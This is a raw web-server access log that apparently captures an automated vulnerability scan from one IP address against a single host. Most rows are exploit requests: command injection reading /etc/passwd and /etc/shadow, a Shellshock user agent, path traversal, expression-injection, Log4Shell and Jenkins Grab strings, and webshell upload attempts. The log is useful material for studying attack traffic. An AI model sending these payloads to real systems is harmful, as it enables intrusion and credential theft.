| 20220127-18:46:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /auth |
| 20220127-18:46:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /api/timelion/run |
| 20220127-18:46:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /include/exportUser.php?type=3&cla=application&func=_exec&opt=(cat%20/etc/passwd)%3Enuclei.txt |
| 20220127-18:46:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /include/nuclei.txt |
| 20220127-18:47:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | 54.89.6.87/user/register |
| 20220127-18:47:27 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /web.config.i18n.ashx?l=nuclei&v=nuclei |
| 20220127-18:47:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /login.php |
| 20220127-18:48:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:48:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | https://54.89.6.87/login_pic.asp |
| 20220127-18:48:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | https://54.89.6.87/login_pic.asp |
| 20220127-18:49:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com |
| 20220127-18:49:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com |
| 20220127-18:49:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /mgmt/shared/authn/login |
| 20220127-18:49:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /mgmt/tm/util/bash |
| 20220127-18:49:18 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36 | /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:25 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /laravel52/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:27 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php |
| 20220127-18:49:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /debug.php |
| 20220127-18:49:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /objects/getImage.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=png |
| 20220127-18:49:53 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /objects/getImageMP4.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
| 20220127-18:49:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gbnVjbGVpLnR4dGA=&format=jpg |
| 20220127-18:49:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /objects/nuclei.txt |
| 20220127-18:50:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /ui/vropspluginui/rest/services/getstatus |
| 20220127-18:50:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /wp-content/plugins/contact-form-7/readme.txt |
| 20220127-18:50:21 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /linuxki/experimental/vis/kivis.php?type=kitrace&pid=0;echo%20START;cat%20/etc/passwd;echo%20END; |
| 20220127-18:50:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /upload |
| 20220127-18:50:30 | 45.15.19.130 | 45.15.19.130 | "() { :; }; echo ; /bin/bash -c 'cat /etc/passwd'","/cgi-bin/jarrewrite.sh | NULL |
| 20220127-18:50:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /_async/AsyncResponseService |
| 20220127-18:50:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /boardDataWW.php |
| 20220127-18:51:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /upload/UploadResourcePic.ashx?ResourceID=8382 |
| 20220127-18:51:26 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:51:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36 | /imc/javax.faces.resource/dynamiccontent.properties.xhtml |
| 20220127-18:51:29 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /reports/rwservlet/showenv |
| 20220127-18:51:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /ws_utc/resources/setting/options |
| 20220127-18:51:31 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:/// |
| 20220127-18:51:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /ws_utc/resources/setting/keystore |
| 20220127-18:51:40 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /webadm/?q=moni_detail.do&action=gragh |
| 20220127-18:51:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 |
| 20220127-18:52:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /system/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
| 20220127-18:52:02 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /system/refinery/images/W1siZyIsICJjb252ZXJ0IiwgIi1zaXplIDF4MSAtZGVwdGggOCBncmF5Oi9ldGMvcGFzc3dkIiwgIm91dCJdXQ== |
| 20220127-18:52:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | 54.89.6.87 |
| 20220127-18:52:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36 | /webtools/control/main |
| 20220127-18:53:11 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /console/login/LoginForm.jsp |
| 20220127-18:53:43 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /search.php?search=%22;wget+http%3A%2F%2F%27;%22 |
| 20220127-18:54:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F | /users/sign_in |
| 20220127-18:54:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /CMSPages/Staging/SyncServer.asmx/ProcessSynchronizationTaskData |
| 20220127-18:54:51 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /system/sharedir.php |
| 20220127-18:54:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /en/php/usb_sync.php |
| 20220127-18:55:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 | /ui/h5-vsan/rest/proxy/service/com.vmware.vsan.client.services.capability.VsanCapabilityProvider/getClusterCapabilityData |
| 20220127-18:55:16 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /webtools/control/SOAPService |
| 20220127-18:55:17 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | /manage/webshell/u?s=5&w=218&h=15&k=%73%65%72%76%69%63%65%0a%73%73%68%0a%64%69%73%61%62%6c%65%0a&l=62&_=5621298674064 |
| 20220127-18:55:20 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /manage/webshell/u?s=5&w=218&h=15&k=%0a&l=62&_=5621298674064 |
| 20220127-18:55:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /_search?pretty |
| 20220127-18:55:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=24IBLUiucBEzjeniiESsiRxC18N.php&target=l1_Lw |
| 20220127-18:56:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36 | http://54.89.6.87 |
| 20220127-18:56:00 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /ajax/render/widget_tabbedcontainer_tab_panel |
| 20220127-18:56:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /webadmin/script?command=|%20nslookup%20 |
| 20220127-18:56:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /assets/data/usrimg/24iblupmwyvecstjcpxodebxug5.php |
| 20220127-18:56:06 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /directdata/direct/router |
| 20220127-18:56:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /poc.txt |
| 20220127-18:56:09 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /cgi-bin/login?LD_DEBUG=files |
| 20220127-18:56:56 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /seeyon/thirdpartyController.do.css/..;/ajax.do |
| 20220127-18:57:44 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /Upload/upload_file.php?l=test |
| 20220127-18:57:46 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | /Upload/test/test.php |
| 20220127-18:58:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36 | /webGui/images/green-on.png/?path=x&site[x][text]=%3C?php%20phpinfo();%20?%3E |
| 20220127-18:58:57 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D./a%7D |
| 20220127-18:58:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:59:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /actions/authenticate.php |
| 20220127-18:59:13 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | https://54.89.6.87 |
| 20220127-18:59:41 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /sitecore/shell/ClientBin/Reporting/Report.ashx |
| 20220127-18:59:42 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 |
| 20220127-18:59:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36 | /api/user/reg |
| 20220127-18:59:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36 | /api/group/list |
| 20220127-18:59:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 | /openam/oauth2/..;/ccversion/Version |
| 20220127-18:59:58 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36 | /Schemas/$%7B%27%27.class.forName%28%27javax.script.ScriptEngineManager%27%29.newInstance%28%29.getEngineByName%28%27js%27%29.eval%28%27java.lang.Runtime.getRuntime%28%29.exec%28%22id%22%29%27%29%7D |
| 20220127-19:00:23 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | http://54.89.6.87/mainFrame.htm |
| 20220127-19:00:25 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | http://54.89.6.87/mainFrame.htm |
| 20220127-19:00:28 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm |
| 20220127-19:00:30 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/24IBLSwIbX3MLDiUwnzcU2CaOs3.jsp |
| 20220127-19:00:35 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | /plugin/add |
| 20220127-19:00:37 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36 | /plugin/customMethod |
| 20220127-19:01:19 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | 54.89.6.87/module/login/login.html |
| 20220127-19:01:22 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /cgi-bin/login.cgi |
| 20220127-19:01:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27vulntest%27,%20version=%271%27)%0aimport%20Payload; |
| 20220127-19:02:34 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /api/ping?count=5&host=;cat%20/etc/passwd;&port=80&source=1.1.1.1&type=icmp |
| 20220127-19:02:45 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /crowd/plugins/servlet/exp?cmd=cat%20/etc/shadow |
| 20220127-19:02:49 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36 | /(download)/tmp/poc.txt |
| 20220127-19:02:59 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd |
| 20220127-19:03:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release |
| 20220127-19:03:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license |
| 20220127-19:03:05 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36 | /hsqldb%0a |
| 20220127-19:03:07 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:10 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | /tmui/locallb/workspace/fileSave.jsp |
| 20220127-19:03:12 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:14 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /tmui/locallb/workspace/tmshCmd.jsp |
| 20220127-19:03:50 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /lucee/admin/imgProcess.cfm?file=/whatever |
| 20220127-19:03:52 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /lucee/admin/imgProcess.cfm?file=/../../../context/24IBLTQjJE86AsRudIG8koxOq0a.cfm |
| 20220127-19:03:54 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 | /lucee/24IBLTQjJE86AsRudIG8koxOq0a.cfm |
| 20220127-19:04:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36 | /cgi-bin/mainfunction.cgi |
| 20220127-19:04:15 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36 | /login.action |
| 20220127-19:04:55 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36 | https://54.89.6.87 |
| 20220127-19:05:01 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 | https://54.89.6.87/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData |
| 20220127-19:05:03 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36 | https://54.89.6.87/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData |
| 20220127-19:05:08 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36 | /.%0d./.%0d./.%0d./.%0d./bin/sh |
| 20220127-19:05:32 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36 | /cgi-bin/file_transfer.cgi |
| 20220127-19:05:33 | 45.15.19.130 | 45.15.19.130 | Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36 | /login/ |
